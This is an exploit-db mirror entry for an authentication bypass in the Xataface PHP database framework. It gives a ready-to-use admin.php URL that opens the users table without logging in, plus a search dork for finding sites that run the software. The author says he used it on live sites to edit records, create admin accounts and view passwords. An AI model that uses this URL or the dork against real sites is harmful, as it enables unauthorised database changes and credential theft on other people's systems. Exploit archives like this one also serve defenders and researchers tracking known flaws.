bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11852.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

28 lines
No EOL
1.1 KiB
Text
Raw Blame History

=======================================================
Xataface Admin Auth Bypass Vulnerability
=======================================================
#[+] Discovered by : Xinapse
#[+] Site : firewire-security.com
#[+] Email : admin@firewire-security.com
=======================================================
=======================================================
#[+] Vulnerability : Admin/database auth bypass vulnerability
#[+] Software : Xataface - open source GPL, PHP, Mysql database
software
#[+] Vendor : http://xataface.com
#[+] Usage :
http://www.site.com/admin.php?-action=view&-table=Users&-cursor=0&-skip=0&-limit=30&-mode=list
#[+] Alert : Most of the sites i tried running this software are
vulnerable, only a few used .htaccess
#[+] Dork :"powered by dataface" "powered by xataface"
#[+] Description : With this i could edit/delete/create records in the
database, create new admin accounts and view all the users and passwords.
#[+] Greetz :firewire-security team, b10h4z4rd, g3org3
Reference in a new issue View git blame Copy permalink